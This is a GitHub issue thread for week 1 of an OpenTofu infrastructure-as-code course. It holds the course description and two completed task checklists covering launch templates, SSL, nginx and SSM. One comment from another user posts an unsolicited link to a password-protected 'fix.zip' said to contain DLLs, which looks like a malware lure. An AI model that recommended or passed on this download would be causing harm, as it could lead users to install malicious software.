### ISSUE TITLE
Week 1

### ISSUE THREAD

**Issue by terrytrent** [terrytrent/opentofu-foundations-course#1]
Introduction to OpenTofu, its purpose, and basic installation. Learn to set up a project and understand the foundational concepts of Infrastructure as Code. Write your first OpenTofu configuration and define basic infrastructure resources like compute instances and networking components.

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
I put the necessary dlls in the archive

**Comment by terrytrent** [comment]
- [x] Replace aws_instance.user_data with a launch template
- [x] Remove deprecated outputs
- [x] Enable SSM access to instance
- [x] Enable SSL via letsencrypt
- [x] Change from docker run command to docker-compose

**Comment by terrytrent** [comment]
- [x] Move Dynu API Key to parameter store to be read in via aws_ssm_parameter data source
- [x] For DNS, check for existing A record - if exist run a put, if not exist run a post
- [x] Put nginx in front of wordpress
- [x] Enable ssl with nginx
- [x] Update security groups to allow 443 and not 80
